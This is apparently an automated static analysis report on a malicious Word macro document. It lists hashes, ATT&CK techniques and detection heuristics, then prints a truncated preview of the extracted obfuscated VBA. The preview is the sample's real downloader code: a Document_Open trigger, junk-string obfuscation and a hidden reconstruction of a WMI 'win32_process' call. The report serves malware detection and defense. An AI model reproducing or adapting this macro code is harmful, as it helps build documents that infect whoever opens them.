Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 73bb57416aa009d5…

MALICIOUS

Office (OLE)

Size: 192.0 KB
Created: 2020-08-19 07:18:00
Authoring application: Microsoft Office Word
First seen: 2020-09-07
MD5: 1a1ebba24be99815739e98634f49362f
SHA-1: 76e908d39d2a66076be636161cd68b760a5c5fca
SHA-256: 73bb57416aa009d5bc50da9027eec6bc8bec76050d7db2a4626cf60bb4f5331a
Risk Score: 262

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. Critical heuristics indicate a hidden command stager within a UserForm, designed for auto-execution via the Document_Open macro. This pattern strongly suggests the VBA code is intended to download and execute a secondary payload, aligning with the ClamAV detection of 'Doc.Downloader.Generic-9390488-0'. The specific VBA code is heavily obfuscated with string concatenations and conditional logic, making precise reconstruction of the payload URL or execution command impossible from the provided excerpt.

Heuristics (7)

  • ClamAV: Doc.Downloader.Generic-9390488-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-9390488-0
  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager [critical] OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)   15381 bytes
SHA-256: e0b10553a0bd3b32dd10c3e6cc8c6e9ade31d242dd83cce76a2582cf6ec74cbc

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "G20j3op9yc86j"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Sxwwyn1boy3cncudo.Jg1ei_e2zdh1lq
End Sub


Attribute VB_Name = "Sxwwyn1boy3cncudo"
Attribute VB_Base = "0{A6A480C1-6A53-4E77-927F-3412280DB4C0}{9A2BC25A-97B4-4DF3-AD61-D105C05304D5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Jg1ei_e2zdh1lq()
   Zl6b97lc6d72rlb = "937"
If Len("F1o_cmfjj2k51sevwTnokm5ni6_t84vhll") = Len("Xluxgv4gvrmn") + 1 Then End
If Len("Hf1uzo8ouw5rf1n01xE0zkhdh4sfj88sG3cat9o3m11") < Len("A6qh769gav6t") Then
        MsgBox "Mvpil190frv7zd" + "Uhmvs9g0c9nb0l"
        MsgBox ("R8uubn_tba3")
        MsgBox "Wo6mg3qp5jka" + "Ixnk9y0ye4zlfbe"
End If
If Len("Rlu12kuhwhkt8gpwtT2widm5t2vg") = Len("A1lwf01l3ac") Then
       MsgBox "S2oq29oc3elo" + "Lii7hu0bvgvi"
       MsgBox ("Ar8ii1yrum0n4 !!!")
       MsgBox "Fdj8o8p12spvrddev" + "Fq89gu7w1177ktp23"
End If

Luvixzstp22i4ewuk = Sxwwyn1boy3cncudo.HelpContextId + 50 + 50
   Zwipehr7h7ssjh = "112"
If Len("Lti5kdh04pbln2cD75ghdh4melu7z6") = Len("E6zwfiuo4xp_c7eeem") + 1 Then End
If Len("Qqaomlpsg4xdeuDscro8mqnuyhLagqtliqfqmk11nw") < Len("Olp82wcy0ska") Then
        MsgBox "Vzdzcgwhv4m1_c2g" + "E05ham451pd3u59q"
        MsgBox ("Pxgbyh_0_tdh2um")
        MsgBox "Hlmgq5ml6n2spa" + "Kjsqd_xt25ia51x073"
End If
If Len("Hswkc3l7glqsuNz9jdjty4vmh5twio7") = Len("D2r4_py4eqhkmzbk") Then
       MsgBox "S13t3w1b960" + "G99v2oic795pqohvk"
       MsgBox ("N3iwtzeioe2 !!!")
       MsgBox "Buza7sk1wk4ie37mc" + "Kf28mhuypiqta"
End If

F2r_y26qnz1tsgw = ChrW(Luvixzstp22i4ewuk + (15))
   J_o1dzci_lwilm0k = "494"
If Len("L6igugb26ydWbqxv2klh8itn") = Len("Ndx7gf9s15ht54m_") + 1 Then End
If Len("A00ekgw1wz_7Pz48y0d_s0molwpXr0iyiupsi8") < Len("Duq0wght18e") Then
        MsgBox "Wjsax1_uhyzhay" + "Kfnoqbc59sn3ep8mam"
        MsgBox ("Jo1t44jn5s7j00k")
        MsgBox "Jmszn4putj96fkly7" + "Iszwvwgyjmcjo5"
End If
If Len("Pt_txhu0fat6oitgiNx3f237szudsk7") = Len("Zu3meij3ttw") Then
       MsgBox "T4q1g677gcq" + "Fxfs_7y2y2py36dfj"
       MsgBox ("Gwf1e1i69yo_98d_er !!!")
       MsgBox "T3x77pbn49l" + "Sxl55xstpjf0_my4"
End If

Nq7quy7fq0zduif = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + F2r_y26qnz1tsgw + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Sxwwyn1boy3cncudo.Dyt4hxr572u6li + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf"
   Kkpfyoat972u = "375"
If Len("Mi2b3ajr8g_otwzmmWqcs92prkdyjhxxvw") = Len("Nllxczreq2e3lgw") + 1 Then End
If Len("We4_kawl2f4Zm20ae5briona5kzM3rye4t4xksza") < Len("X75feag3hmvww2p0r1") Then
        MsgBox "Yjnla6tigo5mmrnrrg" + "Ezh2vfcsg4ny433c"
        MsgBox ("Ov5kv3_ooajfjj93")
        MsgBox "Oi2s4g9nnp41auup1" + "Xnnv8hmgf5m9tq7_ht"
End If
If Len("D2o79inhynqz2Iapr_mtfwadap7n") = Len("Bmacvgtrpmuaz5zfw") Then
       MsgBox "Fprtih40fo494r" + "Vmezy_fs9bx4sr4l0"
       MsgBox ("Bz9ote5kwbezsu !!!")
       MsgBox "E7rvq0oc8ts" + "Kksmc5t347q4_6n"
End If

Uog4tegi91ssz4ss0 = Zcasbv2yl2b_urkc(Nq7quy7fq0zduif)
   Jkpkotlqbfxf86 = "693"
If Len("Rrwcb3bhz2u8ydpXegh2uj7pgh92ngpj") = Len("No_1oync1u6xxnw") + 1 Then E
... (truncated)